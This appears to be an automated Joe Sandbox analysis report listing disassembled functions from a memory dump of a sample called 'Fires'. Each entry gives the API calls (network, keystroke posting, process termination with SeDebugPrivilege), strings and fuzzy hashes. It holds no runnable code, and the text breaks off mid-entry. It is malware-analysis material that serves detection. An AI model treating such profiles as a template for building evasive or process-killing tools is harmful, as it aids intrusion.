Opcode Fuzzy Hash: 83e95f93bfcdfff70056cdb90d714d2bfd17b2dcadf81e098bf46309c9fc413a
Instruction Fuzzy Hash: BDC1393990465AEFDB10DFA8C540BEDBBB1FF18310F18841AE899E7250DB34E951DBA4

Function 00D7D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00D7D237
_free.LIBCMT ref: 00D7D2A2
_free.LIBCMT ref: 00D7D2C8
_free.LIBCMT ref: 00D7D2F1
_free.LIBCMT ref: 00D7D329
_free.LIBCMT ref: 00D7D35A
_free.LIBCMT ref: 00D7D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00D7D41C
_free.LIBCMT ref: 00D7D435

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 8ac0364d977319e42e5f344f2b64c6c41afdb3c8726a6d91ebc28884732979e5
Instruction ID: 78035a055c29faf138f42e22d07f291b1be15a11f4767a3ebd5242d09aac41f1
Opcode Fuzzy Hash: 8ac0364d977319e42e5f344f2b64c6c41afdb3c8726a6d91ebc28884732979e5
Instruction Fuzzy Hash: AC610671904340AFDB21AF75E8816BE7BB6EF41320F18C1ADE94CA7286F631D94187B5

Function 00DBCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DBCBC7
GetLastError.KERNEL32 ref: 00DBCBDA
SetEvent.KERNEL32(?), ref: 00DBCBEE

Part of subcall function 00DBCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DBCCB7
Part of subcall function 00DBCC98: GetLastError.KERNEL32 ref: 00DBCD67
Part of subcall function 00DBCC98: SetEvent.KERNEL32(?), ref: 00DBCD7B
Part of subcall function 00DBCC98: InternetCloseHandle.WININET(00000000), ref: 00DBCD86

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 8c5fd0a080a51c94ff1566d3dd83e94cecbf9fd300cc5785d063d9ef1439d70c
Instruction ID: 7579302fb7dabd443dbb416d8fdd86c880eb3d3106dd8c3f7b6329bc5cb46a8b
Opcode Fuzzy Hash: 8c5fd0a080a51c94ff1566d3dd83e94cecbf9fd300cc5785d063d9ef1439d70c
Instruction Fuzzy Hash: 14315871611705EFDB219F658D44ABABFA9FF54300B14552EF89BC2610D731E814ABB0

Function 00DA2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA43AD
Part of subcall function 00DA4393: GetCurrentThreadId.KERNEL32 ref: 00DA43B4
Part of subcall function 00DA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DA2F00), ref: 00DA43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00DA2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DA2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DA2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DA2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DA2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DA2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00DA2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DA2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DA2F74

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a480b419ed4d9362326c5b50ee5cbc91b90ee7bdd2de3287f82d508f5058bfa1
Instruction ID: 1215e21f3448a95afc7e3243a1929e73cdcb63d470578b19106e786c17b7b7bb
Opcode Fuzzy Hash: a480b419ed4d9362326c5b50ee5cbc91b90ee7bdd2de3287f82d508f5058bfa1
Instruction Fuzzy Hash: FD01D830784314BBFF106B699C8AF593F5ADF5EB11F100012F358EE2E0C9E154448AB9

Function 00DA2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DA1D95,?,?,00000000), ref: 00DA2159
HeapAlloc.KERNEL32(00000000,?,00DA1D95,?,?,00000000), ref: 00DA2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DA1D95,?,?,00000000), ref: 00DA2175
GetCurrentProcess.KERNEL32(?,00000000,?,00DA1D95,?,?,00000000), ref: 00DA217D
DuplicateHandle.KERNEL32(00000000,?,00DA1D95,?,?,00000000), ref: 00DA2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DA1D95,?,?,00000000), ref: 00DA2190
GetCurrentProcess.KERNEL32(00DA1D95,00000000,?,00DA1D95,?,?,00000000), ref: 00DA2198
DuplicateHandle.KERNEL32(00000000,?,00DA1D95,?,?,00000000), ref: 00DA219B
CreateThread.KERNEL32(00000000,00000000,00DA21C1,00000000,00000000,00000000), ref: 00DA21B5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3d782314471d60b705adec58b090469be2da122e2a644726883c4d27fc765f0c
Instruction ID: 263af28b29b68c97d47c59fb7fef1553ca8d3bcc659b660867c9baad2f774651
Opcode Fuzzy Hash: 3d782314471d60b705adec58b090469be2da122e2a644726883c4d27fc765f0c
Instruction Fuzzy Hash: F001BBB5241304BFEB10AFA5DC4DF6B7BADEB89711F004412FA05DB2A1CA709804CB30

Function 00DACE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D441EA: _wcslen.LIBCMT ref: 00D441EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DACF99
_wcslen.LIBCMT ref: 00DACFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DAD047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DAD075

Strings

0, xrefs: 00DACF5A
,*, xrefs: 00DACF0C
<*, xrefs: 00DACEF6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*$0$<*
API String ID: 1227352736-815946194
Opcode ID: 49403ff54f825d227f7aea30e3dd09be0d031d6fb676eb3b20d35113f2d1dfbd
Instruction ID: aee9d3622571358d49781022e4a72d423061b7ebf472c1117248f6d2e9f541ed
Opcode Fuzzy Hash: 49403ff54f825d227f7aea30e3dd09be0d031d6fb676eb3b20d35113f2d1dfbd
Instruction Fuzzy Hash: 0351CF716153009FD714AF28C845B6BBBEAEF86324F080A2DFA92D31E1DB74C9458776

Function 00DCAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00DADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00DADDAC
Part of subcall function 00DADD87: Process32FirstW.KERNEL32(00000000,?), ref: 00DADDBA
Part of subcall function 00DADD87: CloseHandle.KERNEL32(00000000), ref: 00DADE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DCABCA
GetLastError.KERNEL32 ref: 00DCABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DCAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00DCACC5
GetLastError.KERNEL32(00000000), ref: 00DCACD0
CloseHandle.KERNEL32(00000000), ref: 00DCAD21

Strings

SeDebugPrivilege, xrefs: 00DCABEC

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a42f0dc1255bc70d2408537afc09c6395987f78158e751ccb57d63ba7c74f82b
Instruction ID: d9597a7c6c6469a0ffba7e9470a25abb0b9aa9b115b2be2c87c564a31a814ba1
Opcode Fuzzy Hash: a42f0dc1255bc70d2408537afc09c6395987f78158e751ccb57d63ba7c74f82b
Instruction Fuzzy Hash: 7B618C74204246AFD710DF19C595F26BBE1EF54308F19849CE4668BBA2C771EC45CBB2

Function 00DD4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DD43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00DD43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DD43F0
_wcslen.LIBCMT ref: 00DD4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00DD4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DD4490

Strings

SysListView32, xrefs: 00DD4393

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: d92d5e3b9ffa03abfae4888be207c19781e7c0961a996cc7e2327617b9328727
Instruction ID: 918787e69927f7d7f21e558d2d4e402aaaeacab51cf76ca74774f0a9cd8b0df7
Opcode Fuzzy Hash: d92d5e3b9ffa03abfae4888be207c19781e7c0961a996cc7e2327617b9328727
Instruction Fuzzy Hash: B241C271A00309ABDF219F68CC49BEA7BA9FF48350F140126F944E7391D7709994DBB0

Function 00DAC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DAC6C4
IsMenu.USER32(00000000), ref: 00DAC6E4
CreatePopupMenu.USER32 ref: 00DAC71A
GetMenuItemCount.USER32(014B6858), ref: 00DAC76B
InsertMenuItemW.USER32(014B6858,?,00000001,00000030), ref: 00DAC793

Strings

0, xrefs: 00DAC66F
2, xrefs: 00DAC6FE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 6fa119535ad362a65bc5e2cbee08fe4dac30c22f5fe9fb77b800a5385fd2b8f7
Instruction ID: a1ceeb71447f45b5dd40ed4568fcb90a3772b5e71891da6681e6c771525f74f5
Opcode Fuzzy Hash: 6fa119535ad362a65bc5e2cbee08fe4dac30c22f5fe9fb77b800a5385fd2b8f7
Instruction Fuzzy Hash: C4519D70610205ABDF20CF68D984BAEBBF9AF46324F28515AE912E7291D7709D41CF71

Function 00DD86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00DD8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DD8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DD877D
GetSystemMetrics.USER32(00000004), ref: 00DD87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00DBC1F2,00000000), ref: 00DD87C6

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

GetSystemMetrics.USER32(00000004), ref: 00DD87B1

Strings

(, xrefs: 00DD8709

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (
API String ID: 2294984445-2063206799
Opcode ID: 805585b79f72dde05ae52c05ee7bdfc67c66d639faf631976afb707da398b22d
Instruction ID: 75ed35062f9fcdcdc9f4a2582e59a5707684c9809b68262fbba33a34e9cee301
Opcode Fuzzy Hash: 805585b79f72dde05ae52c05ee7bdfc67c66d639faf631976afb707da398b22d
Instruction Fuzzy Hash: E6218E71611245FFCF159F39CC08A6A77A6EB85325F29462AF926D32E0DA30D850EB30

Function 00DAE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00DAE759
gethostname.WSOCK32(?,00000100), ref: 00DAE773
gethostbyname.WSOCK32(?), ref: 00DAE780
inet_ntoa.WSOCK32(?), ref: 00DAE7C2
_strcat.LIBCMT ref: 00DAE7D0
WSACleanup.WSOCK32 ref: 00DAE7F5

Strings

0.0.0.0, xrefs: 00DAE79E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: db271e938a7a46be1975924d9704dd78570c19d661ed1f164c63ef9832feac60
Instruction ID: 18c2d3c922605fc2b7c441788d2d5ccd8da44b83930e22ff942100196acb5665
Opcode Fuzzy Hash: db271e938a7a46be1975924d9704dd78570c19d661ed1f164c63ef9832feac60
Instruction Fuzzy Hash: E211E131901214BBCB20AB70DC4AEEA77ACEF02710F0500A6F545E6191EEB48A81DAB0

Function 00DAF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00DAF641
_wcslen.LIBCMT ref: 00DAF652
_wcslen.LIBCMT ref: 00DAF690
_wcslen.LIBCMT ref: 00DAF6C6
_wcslen.LIBCMT ref: 00DAF6F6
_wcslen.LIBCMT ref: 00DAF706
_wcslen.LIBCMT ref: 00DAF742
_wcslen.LIBCMT ref: 00DAF771

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 3e37462963a75b3ab3574ef11eca04f8b99c347fa27360ea42deda58c130e66b
Instruction ID: b4cf8298a2ece827deeb89a85828323bdbc8aead1e000a596d62d2050fad58cb
Opcode Fuzzy Hash: 3e37462963a75b3ab3574ef11eca04f8b99c347fa27360ea42deda58c130e66b
Instruction Fuzzy Hash: 3A417565D1111876DB11EBF8DC86ACFB7A8EF05310F518462E518E3121FB34D265C3B6

Function 00DD379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DD37B7
GetDC.USER32(00000000), ref: 00DD37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD37CA
ReleaseDC.USER32(00000000,00000000), ref: 00DD37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DD3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DD3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DD6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00DD385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DD387D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 423dae8938084ce486d0ba8913c86b853d252e3985de931d9f07cbf688bd4902
Instruction ID: c51f82abf8dc314416991a75106ce14dfa39590dbdf1fc30709d9061b27f3d7a
Opcode Fuzzy Hash: 423dae8938084ce486d0ba8913c86b853d252e3985de931d9f07cbf688bd4902
Instruction Fuzzy Hash: 26317C72201214BBEF114F54DC89FEB3BAEEB49711F084066FE09DA291C6B59841C7B0

Function 00DC5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00DC5A8B, 00DC5DE0
Not an Object type, xrefs: 00DC5A64

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 20f22c239ea513fbf5f0eb3c70e98d7d15ed5d94efcd9c32769730def6c28f9a
Instruction ID: 9f8ca76de82df2405238c4e52508921d0b6e438162d04aa1d7493fd3d5f0963c
Opcode Fuzzy Hash: 20f22c239ea513fbf5f0eb3c70e98d7d15ed5d94efcd9c32769730def6c28f9a
Instruction Fuzzy Hash: 5DD18D71A0070A9FDF10CF68D885FAEB7B5EB48344F18816DE916AB285D770ED85CB60

Function 00D818A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D81B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D8194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D819D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D81B7B,?,00D81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D81A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D81A7B

Part of subcall function 00D73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D66A79,?,0000015D,?,?,?,?,00D685B0,000000FF,00000000,?,?), ref: 00D73BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00D81AF7
__freea.LIBCMT ref: 00D81B22
__freea.LIBCMT ref: 00D81B2E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 2404023e6d8a9cb93b1cc5f00267bc41e8641293fcdb52d2187b36ef16343ccd
Instruction ID: 4cd9f48a4b55f84cc8e7c7db0b9ffef2bc05dd6b3ad492a414c4228d3cf4e5e2
Opcode Fuzzy Hash: 2404023e6d8a9cb93b1cc5f00267bc41e8641293fcdb52d2187b36ef16343ccd
Instruction Fuzzy Hash: 6F91C376E00216AADF24AF64C891EEEBBBDEF09710F180619E855E7140E735DC4ACB70

Function 00DC4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DC50A5
VariantInit.OLEAUT32(?), ref: 00DC51A6
VariantClear.OLEAUT32(?), ref: 00DC51B0
VariantClear.OLEAUT32(?), ref: 00DC520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00DC5035, 00DC5163, 00DC521B
Incorrect Object type in FOR..IN loop, xrefs: 00DC5189

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 786228a95a7e4c14ddb7b7ea3c2ac86420cf9516686c53cbad2f51a35644a216
Instruction ID: bde2b1da7ee6abf8c46e4b237d19512fc8079203480e767edbb43207a243782f
